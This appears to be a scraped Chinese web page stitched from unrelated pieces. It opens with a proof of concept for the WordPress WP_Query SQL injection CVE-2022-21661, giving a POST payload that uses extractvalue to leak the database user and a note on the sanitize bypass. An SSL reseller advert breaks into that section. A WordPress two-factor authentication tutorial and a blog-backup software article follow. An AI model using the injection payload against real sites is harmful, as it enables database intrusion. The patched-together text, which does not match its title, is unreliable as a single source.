CVE-2022–21661 WordPress 《=5.3, 攜帶WP_QUERY插件SQL注入

POC：

北關(guān)ssl適用于網(wǎng)站、小程序/APP、API接口等需要進(jìn)行數(shù)據(jù)傳輸應(yīng)用場(chǎng)景，ssl證書未來市場(chǎng)廣闊！成為創(chuàng)新互聯(lián)的ssl證書銷售渠道，可以享受市場(chǎng)價(jià)格4-6折優(yōu)惠！如果有意向歡迎電話聯(lián)系或者加微信：18982081108（備注：SSL證書合作）期待與您的合作！

POST

ecs_ajax_settings??{"post_id":1,"current_page":2,"widget_id":"65054a0","max_num_pages":5}

action?ecsload

query?{"tax_query":{"0":{"field":"term_taxonomy_id","terms":["111) and extractvalue(rand(),concat(0x5e,user(),0x5e))#"]}}

這個(gè)問題來源于temrs沒過濾 再加上 一個(gè)相等條件繞過；

相等條件類似于,下面過濾條件沒有執(zhí)行。導(dǎo)致term攜帶了一些臟數(shù)據(jù)

if(a==b){

return;

}

sanialize(term);

1下圖所示，我們的插件里action鉤子勾住的是這個(gè)方法，這個(gè)方法利用了WP_QUERY存在漏洞的類，注意的是action 一定要有對(duì)應(yīng)的值，所以這個(gè)漏洞限制在。運(yùn)用了WP_QUERY的插件里。所以我們拿了ajax_pagnition這個(gè)插件，定義了action為ecsload

2 下圖所示 我們進(jìn)入方法，此方法構(gòu)造了sql

3 clean query方法 進(jìn)去看看，2的里面調(diào)用了這個(gè)，箭頭指定的地方已經(jīng)打過補(bǔ)丁，強(qiáng)制term為int所以就無法利用了，補(bǔ)丁前不是這樣，而是對(duì)term沒有做任何操作

4進(jìn)入transform_query，在看一下里面。下面試sanitize其實(shí)可以繞過，從而不過濾term這樣，條件都成立，term逃出，sql成立

wordpress那個(gè)認(rèn)證怎么改

越來越多的網(wǎng)站支持添加二步認(rèn)證Two-Factor Authentication以提高安全性，在國內(nèi)更多是以賬號(hào)密碼+短信碼的方式，但海外網(wǎng)站可能更多采用二步認(rèn)證的方式。

如果你覺得有必要為你的WordPress網(wǎng)站開啟二步認(rèn)證，則可以繼續(xù)閱讀本教程，了解如何使用Google Authenticator或者SMS短信驗(yàn)證碼為WordPress添加Two-Factor Authentication。

為什么要為WordPress登錄添加二步驗(yàn)證？

黑客使用的最常見的技巧之一稱為暴力攻擊。通過使用自動(dòng)化腳本，黑客會(huì)嘗試猜測(cè)正確的用戶名和密碼以攻入WordPress 網(wǎng)站。

如果他們竊取了密碼或準(zhǔn)確猜到了密碼，則他們可能會(huì)用惡意軟件感染您的網(wǎng)站，比如掛馬、加密數(shù)據(jù)要挾。

保護(hù)WordPress網(wǎng)站免遭密碼被盜的最簡單方法之一是添加二步認(rèn)證。這樣，即使有人竊取了密碼，他們無法跳過使用手機(jī)輸入安全代碼才能訪問的步驟。

有多種方法設(shè)置WordPress二步認(rèn)證登錄。但是，最安全、最簡單的方法是使用身份驗(yàn)證器應(yīng)用程序。

方法 1. 使用WP 2FA插件添加二步認(rèn)證（更簡單的方法）

方法 2. 使用Two Factor插件添加二步認(rèn)證

方法 1. 使用WP 2FA插件添加二步認(rèn)證

這種方法最為簡單，推薦大家首選此方法。這個(gè)方法很靈活，允許您對(duì)所有用戶強(qiáng)制執(zhí)行二步身份驗(yàn)證。

首先，您需要安裝并啟用WP 2FA – Two-factor Authentication插件。

啟用后，您需要訪問用戶?您的個(gè)人資料頁面并向下滾動(dòng)到“WP 2FA Settings”部分。

點(diǎn)擊“Configure Two-factor authentication (2FA)”按鈕以啟動(dòng)設(shè)置向?qū)А?/p>

插件將要求您選擇一種身份驗(yàn)證方法：

使用您選擇的應(yīng)用程序生成的One-time code（推薦）

通過電子郵件發(fā)送給您的One-time code

建議您選擇app方式認(rèn)證，更安全可靠。然后單擊下一步按鈕繼續(xù)。

該插件將向您展示一個(gè)二維碼，您需要使用身份驗(yàn)證器應(yīng)用（authenticator app）掃描該二維碼。

什么是身份驗(yàn)證器應(yīng)用（Authenticator App）？

身份驗(yàn)證器應(yīng)用是一種智能手機(jī)應(yīng)用程序，可為您保存在其中的帳戶生成一個(gè)臨時(shí)的一次性密碼。

基本上，應(yīng)用和您的服務(wù)器使用密鑰來加密信息并生成一次性代碼，您可以將其用作第二層保護(hù)。

有很多這樣的應(yīng)用可以免費(fèi)使用。

最受歡迎的是Google Authenticator，但它并不是最好的。雖然它工作得很好，但它不提供可以在手機(jī)丟失時(shí)使用的備份。

我們建議使用Authy，因?yàn)樗且粋€(gè)易于使用且免費(fèi)的應(yīng)用程序，該應(yīng)用還允許您以加密格式將您的帳戶保存在云中。這樣，如果您丟失了手機(jī)，則只需輸入主密碼即可恢復(fù)所有帳戶。

其他密碼管理器（如LastPass、1password等）都帶有自己的身份驗(yàn)證器版本，它們都比Google身份驗(yàn)證器要好用得多，因?yàn)樗鼈冎С只謴?fù)密鑰。

在本教程中，我們將使用Authy作為示例。

首先，單擊身份驗(yàn)證器應(yīng)用程序中的添加帳戶按鈕：

然后，該應(yīng)用程序?qū)⒄?qǐng)求訪問您手機(jī)上的相機(jī)的權(quán)限。您需要允許此權(quán)限，以便您可以掃描插件設(shè)置頁面上顯示的二維碼。

身份驗(yàn)證器應(yīng)用現(xiàn)在將保存您的網(wǎng)站帳戶，并開始顯示可用于登錄的一次性密碼。

在插件的設(shè)置向?qū)е?，單擊“I’m Ready”按鈕繼續(xù)。

該插件現(xiàn)在會(huì)要求您驗(yàn)證一次性密碼。只需在身份驗(yàn)證器應(yīng)用中單擊您的帳戶，它就會(huì)顯示一個(gè)六位數(shù)的一次性密碼，輸入該密碼。

之后，該插件將為您提供生成和保存?zhèn)浞荽a的選項(xiàng)。如果您無法使用手機(jī)，則可以使用這些代碼。您可以打印這些備份代碼并將它們保存在安全的地方。

之后，您可以退出設(shè)置向?qū)А?/p>

為所有WordPress用戶設(shè)置WP 2-FA兩步認(rèn)證登錄

如果您運(yùn)行多用戶WordPress網(wǎng)站，例如會(huì)員網(wǎng)站，則該插件還允許您為網(wǎng)站上的所有用戶啟用或強(qiáng)制執(zhí)行二步認(rèn)證登錄驗(yàn)證。

只需轉(zhuǎn)到設(shè)置?Two-factor Authentication頁面即可配置插件設(shè)置。

該插件支持為所有用戶啟用二步認(rèn)證登錄，強(qiáng)制所有用戶登錄，并給用戶足夠的時(shí)間進(jìn)行設(shè)置。

如果您的WordPress網(wǎng)站使用自定義登錄表單頁面，那么您還可以創(chuàng)建一個(gè)自定義頁面，用戶無需訪問WordPress管理后臺(tái)即可在其中管理其二步認(rèn)證身份驗(yàn)證器設(shè)置。

不要忘記單擊“保存更改”按鈕來存儲(chǔ)您的新設(shè)置。

以下是用戶輸入常規(guī)WordPress密碼后，WordPress默認(rèn)登錄界面要求輸入二步認(rèn)證身份驗(yàn)證代碼。

方法 2. 使用Two Factor插件添加二步認(rèn)證

這種方法不太靈活，因?yàn)樵摬寮恢С譃樗杏脩魪?qiáng)制執(zhí)行兩步認(rèn)證登錄。每個(gè)用戶都必須自己設(shè)置，并且可以從他們的個(gè)人資料中禁用它。

首先，您需要安裝并啟用Two Factor插件。

啟用插件后，訪問用戶?個(gè)人資料頁面并向下滾動(dòng)到Two-Factor Options部分。

從這里，您需要選擇一個(gè)二步認(rèn)證登錄選項(xiàng)。該插件支持使用電子郵件、身份驗(yàn)證器應(yīng)用和FIDO U2F安全密鑰方法。

我們建議使用身份驗(yàn)證器應(yīng)用方法。只需下載Google Authenticator、Authy 或 LastPass Authenticator等身份驗(yàn)證器應(yīng)用，然后掃描屏幕上顯示的二維碼。

掃描二維碼后，應(yīng)用程序?qū)⑾蚰@示驗(yàn)證碼，您需要在插件選項(xiàng)中輸入該驗(yàn)證碼，然后單擊提交按鈕。

該插件現(xiàn)在將設(shè)置密鑰。您可以隨時(shí)從設(shè)置頁面重置此密鑰以重新掃描二維碼。

不要忘記單擊“Update Profile”按鈕以保存您的設(shè)置。

現(xiàn)在，每次您登錄WordPress網(wǎng)站時(shí)，系統(tǒng)都會(huì)要求您輸入手機(jī)上應(yīng)用生成的驗(yàn)證碼。

關(guān)于WordPress中二步認(rèn)證 (2FA) 的常見問題

以下是有關(guān)在WordPress中使用兩步認(rèn)證登錄的一些常見問題的解答。

1. 如果無法訪問手機(jī)，如何登錄？

如果您使用的是帶有Authy等云備份選項(xiàng)的身份驗(yàn)證器應(yīng)用，那么您也可以在筆記本電腦上安裝該應(yīng)用程序。

即使沒有隨身攜帶手機(jī)，您可以訪問身份驗(yàn)證代碼。它還支持在購買新手機(jī)時(shí)恢復(fù)您的密鑰。

上面提到的兩種方法還支持您生成備份代碼。當(dāng)您無法使用手機(jī)時(shí)，這些代碼也可用作一次性密碼。

2. 如何不用密碼登錄？

如果您無權(quán)訪問手機(jī)、筆記本電腦或備用代碼，則只能通過禁用該插件來登錄。

停用所有插件后，它還將禁用二步身份驗(yàn)證插件，您將能夠登錄到您的WordPress網(wǎng)站。登錄后，您可以重新啟用插件并重置二步身份驗(yàn)證設(shè)置。

3. 我還需要密碼保護(hù)WordPress管理文件夾嗎？

從使用HTTPS和安全WordPress托管等基礎(chǔ)知識(shí)開始，當(dāng)您擁有多層安全保護(hù)來保護(hù)您的網(wǎng)站時(shí)，網(wǎng)站安全效果最佳。二步認(rèn)證的主要目的是加強(qiáng)WordPress登錄安全，但您可以通過密碼保護(hù)WordPress管理后臺(tái)使其更加安全。

如果的WordPress網(wǎng)站是一個(gè)會(huì)員網(wǎng)站、在線商店或在線課程網(wǎng)站，就更應(yīng)該做二步認(rèn)證登錄。

關(guān)于WordPress安全，建議大家可以閱讀“如何有效地保護(hù)您的WordPress站點(diǎn)免受攻擊入侵”和“WordPress網(wǎng)站免費(fèi)SSL證書申請(qǐng)及配置教程”，來進(jìn)一步完善WordPress安全防護(hù)措施。

原創(chuàng)文章，作者：微想小云，如若轉(zhuǎn)載，請(qǐng)注明出處：

Wordpress下載Wordpress主機(jī)推薦Wordpress使用心得Wordpress怎么建站W(wǎng)ordpress插件Wordpress虛擬主機(jī)Wordpress問題解決

贊 (0)

生成海報(bào)

如何有效地保護(hù)您的WordPress站點(diǎn)免受攻擊入侵

上一篇2022年 9月 24日 am8:13

如何正確地刪除WordPress

博客備份

BlogDown博客備份注意事項(xiàng)

在博客備份過程中，經(jīng)常會(huì)遇到一些問題，例如，何時(shí)備份博客？如何備份博客更快？如何導(dǎo)出博客到本地？如何選擇備份的文件等等。這其中的一些注意事項(xiàng)可以總結(jié)如下：

一、備份時(shí)間問題

備份博客一般是隔一段時(shí)間就備份一次，但如果是重要價(jià)值的博客，例如親子博客，日志記錄等，應(yīng)該經(jīng)常性的備份。由于博客經(jīng)常會(huì)有新的文章產(chǎn)生，BlogDown中的增量備份博客功能，可以提供備份的便利，在任何時(shí)刻都可以輕松備份最新的博客文章，備份的時(shí)候可以只備份新的博客，而不要又把舊的博客備份一遍。

二、備份文件問題

備份后的博客最好做成電子書文件格式保存，這樣如果博客出現(xiàn)問題，例如丟失或被關(guān)閉，則不會(huì)導(dǎo)致更大損失。另外，備份成電子書可以方便閱讀收藏，有很多有價(jià)值的博客值得永久收藏，例如親子博客，專業(yè)博客等等，可以備份下來后作為資料收藏。另外，BlogDown中word格式的電子書可以用于出書打印，還可以編輯里面的內(nèi)容，包括文字和圖片。

三、電子書格式問題

備份后的博客電子書可以選擇很多格式，例如通用電子書chm格式，可以不用其他軟件就能打開閱讀。還有原始的網(wǎng)頁格式html，以及最簡單的純文本格式txt，另外，也可以選擇word格式，更加方便編輯和打印。這些格式都各有優(yōu)點(diǎn)，電子書chm格式比較容易閱讀，壓縮率較高，方便攜帶，里面可以帶圖片。純文本txt格式不包含圖片，但對(duì)于文字較多的博客則比較適合。BlogDown中的博客書word格式，里面也可以包含圖片，文字和圖片是軟件自動(dòng)排版的，導(dǎo)出后就是一本書的感覺，可用于打印出書。

四、博客排版問題

由于每個(gè)博客的風(fēng)格不一樣，在網(wǎng)上的博客都有各種模板使用，所以排版都是千變?nèi)f化，各式各樣，彰顯了個(gè)性，突出了特色。但備份到本地的電子書之后，其格式可能會(huì)發(fā)生一定的變化。如果是電子書chm格式，則可以保持跟網(wǎng)絡(luò)上的格式相對(duì)一致，因?yàn)閏hm本質(zhì)顯示的是網(wǎng)頁格式，所以可以繼承在線博客文章的風(fēng)格，例如顏色，字體，大小，圖片尺寸等等。但如果導(dǎo)出為純文本txt格式，則只保留文字內(nèi)容，沒有圖片，其文字的排版是一個(gè)問題。由于在線博客的風(fēng)格各異，段落可能亂七八糟，所以軟件會(huì)自動(dòng)對(duì)文字進(jìn)行排版，導(dǎo)出的txt格式會(huì)非常工整。更進(jìn)一步，word格式包括圖片，軟件會(huì)自動(dòng)對(duì)文字和圖片混合排版，非常整齊漂亮。

五、微博備份問題

微博的備份跟博客的備份有相同之處，但又有區(qū)別。博客內(nèi)容一般比較長，所以做成電子書后一般作為一篇文章即可，閱讀效果較好。但微博的篇幅較短，且量又比較多，所以微博備份更適合用分頁的電子書格式，這樣把多篇微博放在一頁里面，形成翻頁風(fēng)格，保持與在線微博一樣的形式。在BlogDown軟件里，導(dǎo)出的時(shí)候，可以選擇分頁電子書格式，更加適合微博備份，并且更適合手機(jī)或平板電腦閱讀。另外，微博備份時(shí)沒有標(biāo)題，且沒有分類，可以在導(dǎo)出的時(shí)候，把分類這項(xiàng)內(nèi)容去掉。

六、博客離線編輯問題

在線博客都提供了豐富的文章編輯工具，但如果能夠離線編輯，則可以提供更加快速和方便的文章編輯功能。在BlogDown軟件里，可以選擇編輯修改文章按鈕，對(duì)博客文章的標(biāo)題，時(shí)間，分類以及博客內(nèi)容進(jìn)行修改。這樣在備份之后，可以對(duì)以前發(fā)表的博客文章進(jìn)行再次編輯，例如如果以前發(fā)表的文章有錯(cuò)誤的地方或者不滿意之處，則可以再次編輯，然后再導(dǎo)出?？梢跃庉嫸啻危谲浖锞庉嫴挥绊懺诰€博客內(nèi)容，只是影響導(dǎo)出后的文件。

七、文章部分導(dǎo)出問題

有時(shí)不想導(dǎo)出全部文章，而是導(dǎo)出某個(gè)分類的文章，或者某個(gè)時(shí)間段的文章，或者某個(gè)關(guān)鍵字的文章。這些問題，在BlogDown軟件里都可以實(shí)現(xiàn)。導(dǎo)出某個(gè)分類的文章，可以對(duì)分類排序，只需選擇這個(gè)分類的文章到臨時(shí)文章列表，然后導(dǎo)出臨時(shí)文章列表即可。導(dǎo)出每個(gè)時(shí)間段文章，選擇時(shí)間段的多篇文章，可以一次多選，然后同樣添加到臨時(shí)文章列表。如何導(dǎo)出某個(gè)關(guān)鍵字的文章，首先查詢文章，然后導(dǎo)出查詢的結(jié)果即可。

當(dāng)前標(biāo)題：攜wordpress的簡單介紹
文章鏈接：http://chinadenli.net/article6/dogsiog.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供微信公眾號(hào)、品牌網(wǎng)站設(shè)計(jì)、電子商務(wù)、云服務(wù)器、網(wǎng)頁設(shè)計(jì)公司、全網(wǎng)營銷推廣

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)